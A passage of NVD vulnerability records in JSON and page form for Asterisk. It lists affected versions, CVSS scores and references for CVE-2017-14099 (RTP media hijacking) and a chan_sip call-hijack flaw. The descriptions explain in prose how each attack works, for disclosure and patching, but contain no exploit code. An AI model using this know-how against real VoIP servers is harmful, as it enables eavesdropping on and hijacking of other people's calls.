              "matchCriteriaId": "D50A355E-1B55-4DD2-8100-EB81AA6FC40E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.0.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "9ADF4230-EFEB-45EC-9C96-0262B4A3E459",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.0.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "5234531C-F69A-4B94-A480-147734206C5A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.0.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "321C1066-6800-4488-A7C4-BE91FF738453",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.1.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "A9B51588-50A2-40B2-A007-06F57D38C7AA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.1.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "CDE2B00C-6AC0-4166-8A25-EFC42CE7F737",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.1.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "9FD404B4-2B0A-4D7A-8CF6-E2C6B4BACBB7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.1.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "617FC4AF-D152-4EE1-828D-C2A6AD0DFD3B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.1.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "3A3FE6DC-17FD-4CEE-BDFB-9D4685640381",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.1.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "8CEEB6C2-0A6D-4434-8446-CB8605CD3B14",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.2.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "1548C574-CD51-49F6-91B1-B06C504000E4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.2.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "7BE4127D-8123-4408-86D3-08168A4501B9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.2.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "8836F348-66DF-43BC-9962-946018D13127",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.4.0:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "1453BB31-D674-4A05-AB2A-2502D127C3E9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.6.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "868865A1-E074-4DB0-A119-D24C5C53FEF9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.6.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "1794440C-7068-4673-9142-6221B8A39E5F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.6.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "C5CF286B-3377-4AE9-A7B9-8535641D639A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.6.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "7B3D89C7-909F-419A-9EE8-A1F0D02934EF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.7.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "50EC8D9D-3483-4080-8000-496343BC8BFD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.7.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "6695F632-6AC4-400F-B513-280304ABC1F3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.7.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "A3423C40-240A-4237-8B0F-A4B4ED421C3F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.8.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "03298D9F-CFB8-48F9-BD0C-8A0BEB0760C9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.8.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "87FCBE6A-C1CD-48EF-A435-4CEADD46C917",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.8.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "42E0E639-70A2-41EE-9B34-A9223D1958AF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.8.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "32E84D64-0CB8-46BF-BD3F-8CA2E0CE4C57",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.8.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "A70420A8-8571-4528-98E1-72BE00270C6E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.9.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "A276363F-F897-4E6D-9D55-5F5AA73DEE26",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.9.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "38230656-6242-4D24-AA67-F42A6FA2FC7F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.9.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "20ED9FC3-5E56-4AE7-903F-267CAE7F2CA5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.9.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "84F88075-9935-45BF-88B7-21ACE8AAB314",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.10.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "DB16D9D6-A2F6-4C4B-B364-1B63B1FFB5F0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.10.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "283793E4-0AE8-48D9-ABCF-70E44FE55C4D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.10.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "A0F79D5F-EB28-417A-86DF-053D6EDBA161",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.10.1:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "4A036F91-70E0-4E97-9896-EEE97BE3C20E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.10.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "C92ECBCD-1EE3-498A-B3A4-22BF8EFD2EE7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.11.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "C4EABFC3-24FA-4441-9F2B-650D90AE5CC6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.11.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "3DA61A22-3DD0-46A3-8C13-F25F4F03FD35",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.12.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "2026FD07-103C-4691-AFA4-88C490382F28",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.12.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "791700CD-E007-489E-9BC6-37025CAA8144",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.12.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "65607103-4284-430A-8212-AC1DCFFFA778",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.13.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "4061B4C7-8315-450C-866A-C4F3A6BCB1A1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.13.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "C6EA7154-7F08-4E43-9270-E617632230AC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.13.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "00099DC9-D437-429B-9D08-F0DFA4942A6C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.14.0:*:*:*:lts:*:*:*",
              "matchCriteriaId": "4149F36C-D455-415F-93D7-F92EEE41419D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.14.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "2DC51129-8F38-4505-90FB-4FFDED45BABF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.14.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "4CA571E0-B513-47AA-95BE-EB4DD2AA91E2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.14.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "89504BDC-82F7-4813-9C1E-456C9ACC6FB3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.14.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "118C550E-79A8-431E-BADB-710EEEEDC6C7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.15.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "96C7950F-41D1-46B5-BA62-E8450CB81244",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.15.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "C9A32ECC-E208-4834-8EF7-FEF7A3495041",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.15.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "5DF6BC60-23F5-46A1-83F8-F4BCDEF196EF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.16.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "AA3E0D41-2E6E-4294-8E56-1A738A7F9AA9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.17.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "D16109B8-4CDF-46FC-9AD9-A158E532791B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.17.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "9DCAA174-3CA3-49DB-BA19-D2BCF4F8953F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.18.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "FD4D1A5A-99A3-4D23-B40C-BBE11EA5B325",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.18.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "0F5EE428-98FF-42BC-9F61-311327B8F610",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.19.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "CBA2FD08-D761-410F-9804-A76F0DD77349",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.20.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "74B34C21-D90B-4E32-BBA6-7773DB663F18",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.21.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "90996D49-5731-4F7D-9DBE-D0599A5D85A9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.21.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "D3C91C8D-707D-443D-985F-FA3EDB181208",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.21.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "400EA2E1-B178-467F-BBC2-1B2ECEDE662A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.21.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "6E00A6C7-D3CF-40B5-A586-06E09C5AA1A3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.22.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "9E25D043-EE0D-49A5-A468-03EDD9CFE0EC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.22.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "CA17630B-444D-4AE4-B582-F8106C4EEFDB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.23.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "62A20D6B-62FE-440D-BC58-F764AAA5562B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.23.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "F2AE880B-2FA2-42BB-BEBF-771E18FDA141",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.23.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "AC982D1B-B018-474E-94BE-2157C21276C7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.24.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "F26815C8-8E43-4C26-947B-986EFFF0ACE1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.24.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "03E8213E-650F-4C95-B9E5-753E7784EF5B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.25.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "00B8F794-A7F2-4B8F-B36C-55E61DC6939A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.25.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "5B7FC3A1-AFB0-4280-BFC5-68F61CFD0AF2",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert1:*:*:*:*:*:*",
              "matchCriteriaId": "322694EF-B086-4BE7-A9F0-41D3A9C245FF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert1_rc1:*:*:*:*:*:*",
              "matchCriteriaId": "781AC882-80DD-4176-8E4F-220343B15F68",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert1_rc2:*:*:*:*:*:*",
              "matchCriteriaId": "770CCEEA-B121-454B-BD36-3FC1B262998A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert10:*:*:*:*:*:*",
              "matchCriteriaId": "5CEBE67E-A3E5-4BC9-8740-4F51123CC9F7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert11:*:*:*:*:*:*",
              "matchCriteriaId": "CD094E25-5E10-4564-9A4D-BE5A14C2815F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert12:*:*:*:*:*:*",
              "matchCriteriaId": "B6873174-0109-402F-ADCA-B1635F441FD9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert13:*:*:*:*:*:*",
              "matchCriteriaId": "B529CD2F-2958-44E6-839A-3E4FE392B1F1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert14:*:*:*:*:*:*",
              "matchCriteriaId": "B961BF46-DEF7-4804-AF9A-D13F160FA213",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert14_rc1:*:*:*:*:*:*",
              "matchCriteriaId": "DDC801D4-7A69-4855-8757-24ACE70D784B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert14_rc2:*:*:*:*:*:*",
              "matchCriteriaId": "60C2B8F0-7722-48B5-89AA-435F52CBC0A4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert15:*:*:*:*:*:*",
              "matchCriteriaId": "B9305CA8-835C-4DFF-9CD8-C1072BACED42",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert16:*:*:*:*:*:*",
              "matchCriteriaId": "B3729EA6-3949-4854-80D4-DC5587161FBD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert2:*:*:*:*:*:*",
              "matchCriteriaId": "013B1940-C45D-4FE2-8B49-D92B8F1A9048",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert3:*:*:*:*:*:*",
              "matchCriteriaId": "A98B11B5-B8E2-4903-B4F7-3AC23751AE8F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert4:*:*:*:*:*:*",
              "matchCriteriaId": "C7D60B24-C509-49C3-87A9-49D05CB44183",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert5:*:*:*:*:*:*",
              "matchCriteriaId": "3C1F9978-44E7-4D39-BEC6-5C6DB7F893E9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert6:*:*:*:*:*:*",
              "matchCriteriaId": "69BA61A8-2A95-4800-BB4E-692BA4321A84",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert7:*:*:*:*:*:*",
              "matchCriteriaId": "C481D8B0-622D-491D-B292-717B0369B507",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert8:*:*:*:*:*:*",
              "matchCriteriaId": "BC8390D4-F339-43FF-9F2B-71331D4ECB81",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert9:*:*:*:*:*:*",
              "matchCriteriaId": "4490B76B-FA41-43DB-9A31-6B3F220F1907",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.13:cert1:*:*:*:*:*:*",
              "matchCriteriaId": "0449B393-FA4E-4664-8E16-BE6B94E4872F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.13:cert1_rc1:*:*:*:*:*:*",
              "matchCriteriaId": "2ED8E415-64FA-4E77-A423-3478E606E58E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.13:cert1_rc2:*:*:*:*:*:*",
              "matchCriteriaId": "E13CA1DD-B384-4408-B4EC-1AA829981016",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.13:cert1_rc3:*:*:*:*:*:*",
              "matchCriteriaId": "EE28BD0A-EA30-4265-A5D6-0390F3558D44",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.13:cert1_rc4:*:*:*:*:*:*",
              "matchCriteriaId": "0F82048D-C65F-4439-BBE4-2D4A9B07EB7E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.13:cert2:*:*:*:*:*:*",
              "matchCriteriaId": "6447B77F-3770-4703-9188-B7344ED98E94",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.13:cert3:*:*:*:*:*:*",
              "matchCriteriaId": "5C103924-1D61-4090-8ED5-4731371B2B2C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.13:cert4:*:*:*:*:*:*",
              "matchCriteriaId": "08F87B09-3867-4CAE-BAD7-2206CD6CAF97",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "In res/res_rtp_asterisk.c in Asterisk 11.x before 11.25.2, 13.x before 13.17.1, and 14.x before 14.6.1 and Certified Asterisk 11.x before 11.6-cert17 and 13.x before 13.13-cert5, unauthorized data disclosure (media takeover in the RTP stack) is possible with careful timing by an attacker. The \"strictrtp\" option in rtp.conf enables a feature of the RTP stack that learns the source address of media for a session and drops any packets that do not originate from the expected address. This option is enabled by default in Asterisk 11 and above. The \"nat\" and \"rtp_symmetric\" options (for chan_sip and chan_pjsip, respectively) enable symmetric RTP support in the RTP stack. This uses the source address of incoming media as the target address of any sent media. This option is not enabled by default, but is commonly enabled to handle devices behind NAT. A change was made to the strict RTP support in the RTP stack to better tolerate late media when a reinvite occurs. When combined with the symmetric RTP support, this introduced an avenue where media could be hijacked. Instead of only learning a new address when expected, the new code allowed a new source address to be learned at all times. If a flood of RTP traffic was received, the strict RTP support would allow the new address to provide media, and (with symmetric RTP enabled) outgoing traffic would be sent to this new address, allowing the media to be hijacked. Provided the attacker continued to send traffic, they would continue to receive traffic as well."
    },
    {
      "lang": "es",
      "value": "En res/res_rtp_asterisk.c en Asterisk 11.x en versiones anteriores a la 11.25.2, 13.x en versiones anteriores a la 13.17.1, y 14.x en versiones anteriores a la 14.6.1 y Certified Asterisk 11.x en versiones anteriores a la 11.6-cert17 y 13.x en versiones anteriores a la 13.13-cert5, es posible divulgar datos sin autorizaci\u00f3n si un atacante ataca en el momento adecuado. La opci\u00f3n \"strictrtp\" en rtp.conf habilita una caracter\u00edstica de la pila RTP que aprende la direcci\u00f3n de origen de los medios para una sesi\u00f3n y coloca cualquier paquete que no se haya originado a partir de la direcci\u00f3n esperada. Esta opci\u00f3n est\u00e1 activda por defecto en Asterisk 11 y superiores. Las opciones \"nat\" y \"rtp_symmetric\" (para chan_sip y chan_pjsip, respectivamente) permiten el soporte RTP sim\u00e9trico en la pila RTP. Esto emplea la direcci\u00f3n de origen de medios entrantes como direcci\u00f3n de destino de cualquier medio enviado. Esta opci\u00f3n no est\u00e1 activada por defecto, pero suele estar habilitada para gestionar dispositivos tras NAT. Se ha realizado un cambio en el soporte RTP estricto en la pila RTP para tolerar mejor los medios tard\u00edos cuando ocurre una reinvitaci\u00f3n. Cuando se combina con el soporte RTP sim\u00e9trico, esto introdujo una avenida en la que se pod\u00eda secuestrar medios. En vez de solo aprender una nueva direcci\u00f3n cuando se espera, el nuevo c\u00f3digo permit\u00eda una nueva direcci\u00f3n de origen que deb\u00eda ser aprendida en todo momento. Si se recibe un flujo de tr\u00e1fico RTP, el soporte RTP estricto permitir\u00eda que la nueva direcci\u00f3n proporcionase medios, y (con RTP sim\u00e9trico habilitado) el tr\u00e1fico saliente ser\u00eda enviado a esta nueva direcci\u00f3n, permitiendo el secuestro de los medios. Si el atacante contin\u00faa enviando tr\u00e1fico, tambi\u00e9n seguir\u00eda recibi\u00e9ndolo."
    }
  ],
  "id": "CVE-2017-14099",
  "lastModified": "2024-11-21T03:12:08.420",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "NONE",
          "baseScore": 5.0,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV30": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 7.5,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "NONE",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
          "version": "3.0"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 3.6,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2017-09-02T16:29:00.287",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2017-005.html"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.debian.org/security/2017/dsa-3964"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://www.securitytracker.com/id/1039251"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Issue Tracking",
        "Patch",
        "Third Party Advisory"
      ],
      "url": "https://bugs.debian.org/873907"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Issue Tracking",
        "Patch",
        "Third Party Advisory"
      ],
      "url": "https://issues.asterisk.org/jira/browse/ASTERISK-27013"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "https://rtpbleed.com"
    },
    {
      "source": "cve@mitre.org",
      "url": "https://security.gentoo.org/glsa/201710-29"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2017-005.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.debian.org/security/2017/dsa-3964"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://www.securitytracker.com/id/1039251"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Issue Tracking",
        "Patch",
        "Third Party Advisory"
      ],
      "url": "https://bugs.debian.org/873907"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Issue Tracking",
        "Patch",
        "Third Party Advisory"
      ],
      "url": "https://issues.asterisk.org/jira/browse/ASTERISK-27013"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "https://rtpbleed.com"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://security.gentoo.org/glsa/201710-29"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-200"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd

Published

2019-11-22 17:15

Modified

2024-11-21 04:33

Severity ?

6.5 (Medium) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Summary

An issue was discovered in channels/chan_sip.c in Sangoma Asterisk 13.x before 13.29.2, 16.x before 16.6.2, and 17.x before 17.0.1, and Certified Asterisk 13.21 before cert5. A SIP request can be sent to Asterisk that can change a SIP peer's IP address. A REGISTER does not need to occur, and calls can be hijacked as a result. The only thing that needs to be known is the peer's name; authentication details such as passwords do not need to be known. This vulnerability is only exploitable when the nat option is set to the default, or auto_force_rport.

References

URL	Tags
cve@mitre.org	http://downloads.asterisk.org/pub/security/AST-2019-006.html	Patch, Vendor Advisory
cve@mitre.org	https://lists.debian.org/debian-lts-announce/2019/11/msg00038.html	Mailing List, Third Party Advisory
cve@mitre.org	https://lists.debian.org/debian-lts-announce/2022/04/msg00001.html	Mailing List, Third Party Advisory
cve@mitre.org	https://www.asterisk.org/downloads/security-advisories	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://downloads.asterisk.org/pub/security/AST-2019-006.html	Patch, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	https://lists.debian.org/debian-lts-announce/2019/11/msg00038.html	Mailing List, Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	https://lists.debian.org/debian-lts-announce/2022/04/msg00001.html	Mailing List, Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	https://www.asterisk.org/downloads/security-advisories	Vendor Advisory

Impacted products

Vendor	Product	Version
digium	asterisk	*
digium	asterisk	*
digium	asterisk	*
digium	certified_asterisk	13.21.0
digium	certified_asterisk	13.21.0
digium	certified_asterisk	13.21.0
digium	certified_asterisk	13.21.0
digium	certified_asterisk	13.21.0
digium	certified_asterisk	13.21.0
debian	debian_linux	8.0
debian	debian_linux	9.0

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "3000F83F-4D47-4BA8-BF35-844C41BFBE18",
              "versionEndExcluding": "13.29.2",
              "versionStartIncluding": "13.0.0",
              "vulnerable": true
